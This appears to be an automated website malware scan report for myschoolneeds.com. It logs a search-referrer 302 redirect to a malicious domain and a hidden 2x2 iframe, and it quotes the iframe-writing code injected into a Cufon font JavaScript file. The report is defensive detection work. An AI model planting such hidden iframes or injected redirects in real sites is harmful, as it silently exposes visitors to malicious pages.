Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://www.myschoolneeds.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: www.myschoolneeds.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Thu, 04 Sep 2014 12:53:23 GMT Location: http://mandy-lange.com/mapn.html Server: Apache Content-Length: 216 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://www.myschoolneeds.com/ | 200 OK Content-Length: 1235 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://mandy-lange.com/mapn.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://mandy-lange.com/mapn.html> | ||
http://cufon.shoqolate.com/js/cufon-yui.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 04 Sep 2014 13:38:33 GMT Location: http://cdnjs.cloudflare.com/ajax/libs/cufon/1.09i/cufon-yui.js Server: lighttpd/1.4.19 Content-Length: 0 | clean |
http://cdnjs.cloudflare.com/ajax/libs/cufon/1.09i/cufon-yui.js | 200 OK Content-Length: 18258 Content-Type: application/javascript | clean |
http://www.myschoolneeds.com/comic_400.font.js | 200 OK Content-Length: 37901 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
Cufon.registerFont({"w":178,"face":{"font-family":"comic","font-weight":400,"font-stretch":"normal","units-per-em":"360","panose-1":"2 0 5 0 0 0 0 0 0 0","ascent":"288","descent":"-72","bbox":"-60 -301.896 383.406 73.5602","underline-thickness":"26.3672","underline-position":"-24.9609","unicode-range":"U+0020-U+F002"},"glyphs":{" ":{"w":114},"\u00a0":{"w":114},"!":{"d":"38,-94v34,-67,28,-69,63,-155v11,-16,57,-6,86,-7v8,0,12,2,12,8v0,13,-20,40,-60,81v-29,45,-43,66,-43,74v-13,3,-40,0,-58,-1x
Cufon.replace('#box', { fontFamily: 'comic' });
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://mandy-lange.com/mapn.html></iframe>');
Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://mandy-lange.com/mapn.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://mandy-lange.com/mapn.html> | ||
http://www.myschoolneeds.com/test404page.js | 404 Not Found Content-Length: 1363 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=myschoolneeds.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://myschoolneeds.com/
Result: myschoolneeds.com is not infected or malware details are not published yet.